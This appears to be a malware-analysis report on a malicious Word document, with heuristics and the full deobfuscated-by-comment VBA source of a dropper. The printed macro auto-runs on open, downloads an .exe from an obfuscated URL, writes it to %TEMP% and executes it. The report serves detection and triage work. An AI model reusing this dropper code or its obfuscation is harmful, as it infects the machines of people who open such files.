MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code upon opening the document. The presence of `Shell()` and `WScript.Shell` usage indicates an attempt to run external commands or scripts. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports its malicious nature as a dropper. The VBA code is heavily obfuscated, but the overall intent appears to be downloading and executing a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium (5 related findings) OLE_VBA_MACROS — Document contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPT — WScript.Shell usage. Matched line in script:
Dim PqhQmZrDTM As String Set HNnuICRGT = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJ — CreateObject call. Matched line in script:
Dim lRDCya As Boolean, RKLHuagrZb As Integer Set wRjSyTPI = CreateObject("MSXML2.ServerXMLHTTP.6.0") Set AKOEP = wRjSyTPI -
CallByName call high OLE_VBA_CALLBYNAME — CallByName call. Matched line in script:
Public Sub MYhRUiRZW(ByVal tOmWjDSFgk As Integer, ByVal jvDRDf As Variant, ByVal msvUvsSS As Variant, ByVal GVHGCZK As Object, ByVal kmhvGVCH As Variant, ByVal WhYXd As Integer, ByVal TJWJeYR As String) CallByName GVHGCZK, TJWJeYR, 1, msvUvsSS, kmhvGVCH, jvDRDf End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPEN — Document_Open macro. Matched line in script:
End Function Private Sub Document_Open() Dim HLsPwd As Integer -
Reference to Windows Script Host high SC_STR_WSCRIPT — Reference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8896 bytes |

SHA-256: e73294f06b031142f1c7034bbe3b4ca1c08cf1d46c8b6093bffd95a24c7457b1

Detection
ClamAV: No threats found
Obfuscation or payload: likely — 177 of 252 identifiers look randomly generated (e.g. 'sUrCMLfXVd7KszCaVGPGfwcdMFWPJeOEG'), consistent with name-mangling obfuscation.
Preview script — first 1,000 lines of the extracted script
' Module metadata emitted by the extractor for the ThisDocument class module.
' These Attribute lines are not executable statements; they only name the
' module and record its class flags.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: the names called here (NddjA, XBccwj, kdFtL, nuvzfFK) are not
' defined anywhere in the extracted source, and nothing in this listing calls
' aeCYcvmRzZ. It appears to be filler/decoy code outside the dropper's real
' execution path.
Private Function aeCYcvmRzZ() As Integer
NddjA
If XBccwj(5601, "k3pSD7C0CnLcxtvpucoptx12Y0y") Then
kdFtL
Else
nuvzfFK
End If
aeCYcvmRzZ = 8139
End Function
' Auto-execution entry point: Word runs this when the document is opened
' (the report's T1204.002 / T1059.005 findings). The two locals are never
' used; the only real work is the call into tzUrRrvI.kcGKjoTFEl, which starts
' the download-and-execute chain.
Private Sub Document_Open()
Dim HLsPwd As Integer
Dim BELWjhUu As Integer
tzUrRrvI.kcGKjoTFEl
End Sub
' Analyst note: mJgHQ and gcLIjQ are not defined in the extracted source and
' nothing in this listing calls jhCNBfJW — apparent decoy code.
Private Sub jhCNBfJW()
mJgHQ False, False, 4238
gcLIjQ True
End Sub
' Start of the next extracted module, ggmTU. It holds the string de-obfuscation
' routine (ggmTU.EabRjzXd) that the rest of the macro relies on.
Attribute VB_Name = "ggmTU"
' Analyst note: every name referenced here (OfSXF, yHQxN, dgWaQn, QREzQooq,
' gxyGcw, qnYhDzuW, bBjpOnw) is undefined in the extracted source and nothing
' calls ySxskQ — apparent decoy code.
Private Sub ySxskQ()
OfSXF "quhdhXT2h8SsEtmXxxDmayxsdQZ", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "SJJYZqMGpbKsWJf8GWIf0pHhS", "q93IG5Pzz5vgb7U6L8qPQrYf3QbS8Nr"
End If
End Sub
' String de-obfuscation routine used throughout the macro (called as
' ggmTU.EabRjzXd). It walks every character of DUVWuFXiJ (spVZG.KgQRkT is
' Len) and keeps only the characters that do NOT occur in IiHcLko
' (spVZG.eyoeZ is an InStr test, spVZG.gIZpIc is Mid(..., 1), spVZG.egcqVU is
' string concatenation). The first argument is therefore a "noise alphabet"
' and the second is the real string with noise characters interleaved.
' The assignments to SBuYvDo, sEodtQL and BhvAq are dead stores and the
' declared locals ofVnGX / xaMXvJj are unused — typical obfuscation padding.
' Triage note: because the filter is this simple, the COM method names and
' the download URL can be recovered statically without executing the macro.
Public Function EabRjzXd(ByVal IiHcLko As String, ByVal DUVWuFXiJ As String) As String
Dim MhBQlGnSC As Boolean
Dim ofVnGX As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For lqfhfc = 1 To spVZG.KgQRkT(3700, "PePnrQ7x5JC0Hloaod4YM83gx", DUVWuFXiJ)
MhBQlGnSC = spVZG.eyoeZ(IiHcLko, "XdXG4f60nlTPJlpTyjc4GokS", spVZG.gIZpIc(DUVWuFXiJ, lqfhfc, 2535, "ws82FVVMj195PQh7CDjN5Q5UlPbZzNKf"))
sEodtQL = "8J0OI2Gn4gIStkIqEFDFjSnfyw"
If Not MhBQlGnSC Then
EabRjzXd = spVZG.egcqVU(EabRjzXd, spVZG.gIZpIc(DUVWuFXiJ, lqfhfc, 2535, "sUrCMLfXVd7KszCaVGPGfwcdMFWPJeOEG"))
End If
BhvAq = "yBN9H5ssB9zjQrc412BnYw89u79G"
Next
End Function
' Analyst note: mGpHG, iUWnPbt, MwUvLHxI, QXMkh, aEcIpbKw and wVbejPo are not
' defined in the extracted source and nothing calls MXoULyrcB — apparent
' decoy code.
Private Function MXoULyrcB(ByVal kAGcfCVr As Boolean) As String
mGpHG "no7PU8UqN3994GWLCHONL4pO2S0IAB", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "Jn6byK9P0xsKD9OouAFsobGxCReMdEz", 3269, False
aEcIpbKw True
wVbejPo
MXoULyrcB = "pAKRs7uXLnDhZoaSYSru3Bmy1pH"
End Function
' Start of module HhgPA: factory functions that instantiate the three COM
' objects the dropper needs (HTTP client, WScript.Shell, ADODB.Stream).
Attribute VB_Name = "HhgPA"
' Analyst note: QuYYqnyOFO, VmdNCfQ and XducHsOfcu are undefined in the
' extracted source and nothing calls IZvPvwXTuj — apparent decoy code.
Private Sub IZvPvwXTuj()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "reWlz4oXWbmX3t6i7r"
End Sub
' Returns a fresh MSXML2.ServerXMLHTTP.6.0 object — the HTTP client used by
' tzUrRrvI.lPYSaB to fetch the second-stage payload. The declared locals are
' unused padding.
' Detection note: an HTTP request issued from the Word process via MSXML is a
' strong behavioural indicator for this sample.
Public Function AKOEP() As Object
Dim lRDCya As Boolean, RKLHuagrZb As Integer
Set wRjSyTPI = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set AKOEP = wRjSyTPI
End Function
' Returns a fresh WScript.Shell object. The macro uses it twice: to read the
' process environment (tzUrRrvI.dbnJPiz) and to launch the dropped file
' (tzUrRrvI.BhdcJycNKh). The local PqhQmZrDTM is unused padding.
Public Function HNnuICRGT() As Object
Dim PqhQmZrDTM As String
Set HNnuICRGT = CreateObject("WScript.Shell")
End Function
' Returns a fresh ADODB.Stream object, used by tzUrRrvI.pWvabeIW to write the
' downloaded bytes to disk. The assignment to kSeUwKWLwH is a dead store.
Public Function UIzCFVgRb() As Object
kSeUwKWLwH = 3434
Set UIzCFVgRb = CreateObject("ADODB.Stream")
End Function
' Analyst note: KbxYhbaay, AvUSfTJh and ZOkaSukV are undefined in the
' extracted source and nothing calls Kdddmkn — apparent decoy code.
Private Sub Kdddmkn()
KbxYhbaay
AvUSfTJh "2zpBXNBTudbglUWcocqOFOlbtEKZs", "OlsREnHPMmP8fkIiQIOaF91sU5ZwXojt", False
ZOkaSukV
End Sub
' Start of module LPZDV: thin CallByName wrappers. Every COM method/property
' is invoked late-bound by name, so the method names never appear as plain
' tokens in the source (they are produced by ggmTU.EabRjzXd at run time).
Attribute VB_Name = "LPZDV"
' CallByName wrapper: invokes method TJWJeYR on GVHGCZK (call type 1 =
' VbMethod) with three arguments, in the order msvUvsSS, kmhvGVCH, jvDRDf.
' tOmWjDSFgk and WhYXd are dummy parameters. Its only caller is
' tzUrRrvI.lPYSaB, where it issues the HTTP request's three-argument open
' call (verb, URL, async flag).
Public Sub MYhRUiRZW(ByVal tOmWjDSFgk As Integer, ByVal jvDRDf As Variant, ByVal msvUvsSS As Variant, ByVal GVHGCZK As Object, ByVal kmhvGVCH As Variant, ByVal WhYXd As Integer, ByVal TJWJeYR As String)
CallByName GVHGCZK, TJWJeYR, 1, msvUvsSS, kmhvGVCH, jvDRDf
End Sub
' CallByName wrapper: invokes the no-argument method NvdTk on PkNSp
' (call type 1 = VbMethod). pkdImvmnOW and IgMMqjdOL are dummy parameters.
' Used for the stream's Open/Close and the HTTP request's Send.
Public Sub GvOWc(ByVal PkNSp As Object, ByVal pkdImvmnOW As Integer, ByVal NvdTk As String, ByVal IgMMqjdOL As String)
CallByName PkNSp, NvdTk, 1
End Sub
' CallByName wrapper: reads property LoyBlUMvM of ypqMoqEPC (call type 2 =
' VbGet) with one index argument HRoHjV and returns the result as an object.
' Used by tzUrRrvI.dbnJPiz to obtain the WScript.Shell environment collection.
Public Function euIsEy(ByVal HRoHjV As String, ByVal LoyBlUMvM As String, ByVal ypqMoqEPC As Object) As Variant
Set euIsEy = CallByName(ypqMoqEPC, LoyBlUMvM, 2, HRoHjV)
End Function
' CallByName wrapper: invokes method WGqTWrH on bOCYDmrV (call type 1 =
' VbMethod) with two arguments, in the order xdzuKEVu, nRgyyARc.
' Used for SetRequestHeader on the HTTP object and SaveToFile on the stream.
Public Sub LPqmOkSW(ByVal nRgyyARc As Variant, ByVal WGqTWrH As String, ByVal xdzuKEVu As Variant, ByVal bOCYDmrV As Object)
CallByName bOCYDmrV, WGqTWrH, 1, xdzuKEVu, nRgyyARc
End Sub
' Analyst note: none of the names called here are defined in the extracted
' source and nothing calls QsqQkln — apparent decoy code.
Private Function QsqQkln(ByVal SdcvSMB As String, ByVal FtFUlPGYW As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "NdcBEm8US8JM2NfSZSQge", 3675
SlRmBd
End If
SCMoUyqWX
QsqQkln = "zHBRy7RqIM0bcXchBXsiE3NsL8Rl"
End Function
' CallByName wrapper: invokes method CIPNVWwVt on GOstYbF (call type 1 =
' VbMethod) with the single argument BKUqZXLGFL. nKYjgLT and FMwrsAtx are
' dummy parameters and the two locals are unused. Used for the stream's
' Write of the response body and for WScript.Shell's Exec of the dropped file.
Public Sub VbzJQuvt(ByVal BKUqZXLGFL As Variant, ByVal nKYjgLT As String, ByVal GOstYbF As Object, ByVal FMwrsAtx As Integer, ByVal CIPNVWwVt As String)
Dim jPxhUYh As String
Dim sHOVMDuQKG As String
CallByName GOstYbF, CIPNVWwVt, 1, BKUqZXLGFL
End Sub
' CallByName wrapper: reads property YFvMnpxfjS of igrGRVjTvH (call type 2 =
' VbGet) with no arguments. tzUrRrvI.lPYSaB uses it to read the HTTP
' response body after Send.
Public Function sGYCMZI(ByVal YFvMnpxfjS As String, ByVal igrGRVjTvH As Object) As Variant
sGYCMZI = CallByName(igrGRVjTvH, YFvMnpxfjS, 2)
End Function
' CallByName wrapper: assigns GZBzxcdnN to property VBnGXSJ of uGxZGzWn
' (call type 4 = VbLet). tzUrRrvI.pWvabeIW uses it to set the stream's Type
' to 1 (binary) before writing.
Public Sub TyOcRODy(ByVal GZBzxcdnN As Variant, ByVal VBnGXSJ As String, ByVal uGxZGzWn As Object)
CallByName uGxZGzWn, VBnGXSJ, 4, GZBzxcdnN
End Sub
' Start of module spVZG: one-line wrappers around InStr, Mid, Len and string
' concatenation, each padded with unused parameters so the primitives used by
' the decoder (ggmTU.EabRjzXd) are harder to spot.
Attribute VB_Name = "spVZG"
' Membership test: InStr(1, CWazqMqmvq, JAYbvbxhUq) coerced to Boolean, i.e.
' True when JAYbvbxhUq occurs anywhere in CWazqMqmvq. IqqAtdqqN and the local
' woDqeWpW are unused padding.
Public Function eyoeZ(ByVal CWazqMqmvq As String, ByVal IqqAtdqqN As String, ByVal JAYbvbxhUq As String) As Boolean
Dim woDqeWpW As Boolean
eyoeZ = InStr(1, CWazqMqmvq, JAYbvbxhUq)
End Function
' Returns the single character at 1-based position bAlcltrmmR of ZiHeJdboO
' (Mid(..., 1)). cOfmv, XDdXTYob and the local GNikinOe are unused padding.
Public Function gIZpIc(ByVal ZiHeJdboO As String, ByVal bAlcltrmmR As Integer, ByVal cOfmv As Integer, ByVal XDdXTYob As String) As String
Dim GNikinOe As String
gIZpIc = Mid(ZiHeJdboO, bAlcltrmmR, 1)
End Function
' Returns Len(wVFPJT). nGeNfOCt, RRhXKCaJc and the local GbNUiUHw are unused
' padding.
Public Function KgQRkT(ByVal nGeNfOCt As Integer, ByVal RRhXKCaJc As String, ByVal wVFPJT As String) As Integer
Dim GbNUiUHw As Integer
KgQRkT = Len(wVFPJT)
End Function
' String concatenation (vKIbNsOBlG & FAJkYVwuu). The local lhCGyWO is unused
' padding.
Public Function egcqVU(ByVal vKIbNsOBlG As String, ByVal FAJkYVwuu As String) As String
Dim lhCGyWO As String
egcqVU = vKIbNsOBlG & FAJkYVwuu
End Function
' Start of module tzUrRrvI: the dropper logic proper. Entry is kcGKjoTFEl
' (called from Document_Open); the chain is xBYopahEOA -> lPYSaB (download)
' -> pWvabeIW (write to disk) -> BhdcJycNKh (execute).
Attribute VB_Name = "tzUrRrvI"
' Obfuscated constant; through ggmTU.EabRjzXd it decodes to "PROCESS", the
' environment-scope name passed to WScript.Shell's Environment property in
' dbnJPiz.
Private Function YqZKd() As String
YqZKd = ggmTU.EabRjzXd("3oLDj9", "P3R39OCLE3So9S")
End Function
' Junk literal. Its only use is as the second argument of LPZDV.VbzJQuvt in
' BhdcJycNKh, a parameter that wrapper ignores.
Private Function KhlShPftoL() As String
KhlShPftoL = "jRxBBBRr9r8gXAEgVVltqsd"
End Function
' Obfuscated constant; decodes to the header name "User-Agent", used by
' lPYSaB when it calls SetRequestHeader on the HTTP object.
Private Function zxIAP() As String
zxIAP = ggmTU.EabRjzXd("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
' Obfuscated constant; decodes to a fixed ".exe" file name with a leading
' path separator. ZLJfda appends it to the %TEMP% directory to build the
' drop path, so the name is a useful file-system indicator for this sample.
' The declared locals are unused padding.
Private Function ZhZSRYCAl() As String
Dim lZkrz As Integer, GJjGE As String
ZhZSRYCAl = ggmTU.EabRjzXd("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
' Obfuscated constant; decodes to "Environment", the WScript.Shell property
' read in dbnJPiz. The assignment to bLjwgJSUR is a dead store.
Private Function IXFItsHYcr() As String
bLjwgJSUR = "8HD8qd18P6jTWqzSlWingS04Pmb1O"
IXFItsHYcr = ggmTU.EabRjzXd("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
' Indirection layer: simply returns kotoKYa, the decoded payload download URL.
' Passed as the first argument of lPYSaB from xBYopahEOA.
Private Function MHJBYstGv() As String
MHJBYstGv = kotoKYa
End Function
' Writes the downloaded bytes to disk through ADODB.Stream, all via late-bound
' CallByName wrappers. With the obfuscated literals decoded the sequence is:
'   Type = 1 (binary)  -> Open -> Write(wGcvY) -> SaveToFile(iQqKRmdaVt, 2) -> Close
' where wGcvY is the HTTP response body and iQqKRmdaVt is the drop path
' (both supplied by lPYSaB). The SaveToFile option 2 corresponds to
' adSaveCreateOverWrite, so an existing file at that path is replaced.
' WDIYOYNYyV and lKLisa are dummy parameters; the locals and IaFbCbvQf are
' unused padding.
' Detection note: WINWORD writing a new .exe under %TEMP% is the key
' file-system event for this stage.
Private Sub pWvabeIW(ByVal iQqKRmdaVt As String, ByVal WDIYOYNYyV As String, ByVal wGcvY As Variant, ByVal lKLisa As String)
Dim wzqXnGyxhx As String
Dim JFoBQuQO As String
IaFbCbvQf = 5255
Set JCFVNKj = HhgPA.UIzCFVgRb
LPZDV.TyOcRODy 1, ggmTU.EabRjzXd("LBoZgmq/", "mTZypoeq"), JCFVNKj
LPZDV.GvOWc JCFVNKj, 8172, ggmTU.EabRjzXd("PiG1UjQ", "OipPeGni"), RHJZaLCkzT
LPZDV.VbzJQuvt wGcvY, RHJZaLCkzT, JCFVNKj, 7897, uMBXJcnEz
LPZDV.LPqmOkSW 2, ggmTU.EabRjzXd("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), iQqKRmdaVt, JCFVNKj
LPZDV.GvOWc JCFVNKj, 8172, ggmTU.EabRjzXd("KMwhE6", "6C6lo6Eswe"), RHJZaLCkzT
End Sub
' Obfuscated constant; decodes to the method name "SetRequestHeader", used by
' lPYSaB to set the User-Agent on the HTTP request.
Private Function LWtEfyzary() As String
LWtEfyzary = ggmTU.EabRjzXd("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
' Obfuscated constant; decodes to the method name "Open" (the HTTP request's
' open call in lPYSaB). The assignment to QhJzBSkuli is a dead store.
Private Function rnGQvnRSSK() As String
QhJzBSkuli = 9116
rnGQvnRSSK = ggmTU.EabRjzXd("PiG1UjQ", "OipPeGni")
End Function
' Orchestrates the whole dropper: lPYSaB downloads the payload (URL from
' MHJBYstGv) to the path returned by ZLJfda, then BhdcJycNKh executes that
' path. ZLJfda is evaluated once for each call, so both stages compute the
' same %TEMP% path independently.
' The On Error GoTo handler with an empty label means any failure (no
' network, blocked download, write denied) exits silently with no user-visible
' error — worth remembering when a detonation shows "nothing happened".
' nHFskkviX is a dead store and the local JOyBEM is unused.
Private Sub xBYopahEOA()
Dim JOyBEM As Integer
On Error GoTo ifNqQzdwr
lPYSaB MHJBYstGv, ZLJfda
nHFskkviX = "gnD46ecw8coTQnGynJ8tnJS491W1X071i"
BhdcJycNKh ZLJfda, "lV0KtTz6t51YfttGZHkdnvrO2Kp", False
Exit Sub
ifNqQzdwr:
End Sub
' Download stage. LVEOROhh is the payload URL, OeatOBP the drop path. Using
' the decoded literals, the late-bound calls on the ServerXMLHTTP object
' (HhgPA.AKOEP) are:
'   Open "GET", LVEOROhh, False        (synchronous request)
'   SetRequestHeader "User-Agent", <fixed UA string from the decoder>
'   Send
'   ResponseBody                       (read via LPZDV.sGYCMZI)
' The response body is then handed to pWvabeIW together with OeatOBP to be
' written to disk. LfPYoESsUK and eNLxFz are dead stores; the string
' arguments on the GvOWc and pWvabeIW calls go to ignored dummy parameters.
' Detection note: the hard-coded User-Agent is a fixed value that can be
' recovered from the decoder and used as a network signature.
Private Sub lPYSaB(ByVal LVEOROhh As String, ByVal OeatOBP As String)
Set pjQzGMXv = HhgPA.AKOEP
LPZDV.MYhRUiRZW 6693, False, ggmTU.EabRjzXd("KAgQjJ2L", "GKLEAT"), pjQzGMXv, LVEOROhh, 9594, rnGQvnRSSK
LfPYoESsUK = False
LPZDV.LPqmOkSW ggmTU.EabRjzXd("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), LWtEfyzary, zxIAP, pjQzGMXv
eNLxFz = "dy2uR23r4GSLFXOoO5K2og2"
LPZDV.GvOWc pjQzGMXv, 8172, ggmTU.EabRjzXd("pZhU24tr", "SZte4ndZ"), "9SgfWqWJZeRe5fK8LbLvebf766Uih"
pWvabeIW OeatOBP, "kA2NvyX6QZAk6q6RSqqvJ", LPZDV.sGYCMZI(ggmTU.EabRjzXd("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), pjQzGMXv), "Md3ylUiOWxjPXZNLjYXYBQmf"
End Sub
' Obfuscated constant; decodes to the method name "Exec", invoked on
' WScript.Shell in BhdcJycNKh to launch the dropped file.
Private Function zJDmhEbpJ() As String
zJDmhEbpJ = ggmTU.EabRjzXd("HqVgy4nv", "Evxvency")
End Function
' Junk literal. It is only ever passed to dummy parameters of the LPZDV
' wrappers (GvOWc / VbzJQuvt in pWvabeIW). usNmDIucf is a dead store.
Private Function RHJZaLCkzT() As String
usNmDIucf = "S5mcnAG5rxsmT61Smmp"
RHJZaLCkzT = "QHG3Vyp3paJUdrYx7cX4CJ8pQzpXJ"
End Function
' Analyst note: none of the names referenced here are defined in the extracted
' source and nothing calls EmqMH — apparent decoy code.
Private Function EmqMH(ByVal gPzNgLiPm As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
EmqMH = "TLaeMhsgZhfByISTRDvzZ"
End Function
' Environment-variable lookup. LPZDV.euIsEy performs
' WScript.Shell.Environment("PROCESS") (property name from IXFItsHYcr, scope
' from YqZKd) and the resulting collection is indexed with GptcunF. ZLJfda
' calls this with a literal that decodes to "TEMP", so the result is the
' user's temp directory. COovMr is a dead store and gscOCk is unused.
Private Function dbnJPiz(ByVal GptcunF As String) As String
Dim gscOCk As String
COovMr = "FmDZdRbi1RKwsOD0v"
Set cVQHwGPr = LPZDV.euIsEy(YqZKd, IXFItsHYcr, HhgPA.HNnuICRGT)
dbnJPiz = cVQHwGPr(GptcunF)
End Function
' Obfuscated constant holding the second-stage download URL. Running the
' literal through ggmTU.EabRjzXd yields a plain http:// URL ending in ".exe";
' the decoded host and path should be treated as network IoCs for this
' sample (not reproduced here — recover them with the decoder).
Private Function kotoKYa() As String
kotoKYa = ggmTU.EabRjzXd("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
' Public entry point invoked from ThisDocument.Document_Open. DSFWQ is a
' dead store; the real work is delegated to xBYopahEOA.
Public Sub kcGKjoTFEl()
DSFWQ = 8775
xBYopahEOA
End Sub
' Obfuscated constant; decodes to the method name "Write", invoked on the
' ADODB.Stream in pWvabeIW.
Private Function uMBXJcnEz() As String
uMBXJcnEz = ggmTU.EabRjzXd("0dYXgI8ls", "lWrliYtgIe")
End Function
' Execution stage: WScript.Shell.Exec(AVDiSC), where AVDiSC is the drop path
' from ZLJfda and the method name comes from zJDmhEbpJ. SvnOO, xJmlIT,
' KhlShPftoL and the two locals are unused padding.
' Detection note: the resulting process tree (WINWORD -> dropped .exe under
' %TEMP%) is the most reliable runtime indicator for this sample.
Private Sub BhdcJycNKh(ByVal AVDiSC As String, ByVal SvnOO As String, ByVal xJmlIT As Boolean)
Dim sxGhki As Integer
Dim ZTjtd As String
LPZDV.VbzJQuvt AVDiSC, KhlShPftoL, HhgPA.HNnuICRGT, 7897, zJDmhEbpJ
End Sub
' Builds the drop path: dbnJPiz("TEMP") (the literal decodes to "TEMP")
' concatenated with the fixed file name from ZhZSRYCAl. NzmDVOpD is a dead
' store and the declared locals are unused.
Private Function ZLJfda() As String
Dim eDdXsOWx As Boolean, rfrVlXygqD As String
NzmDVOpD = False
ZLJfda = dbnJPiz(ggmTU.EabRjzXd("IV6mZvAC", "CTECMmPI")) & ZhZSRYCAl
End Function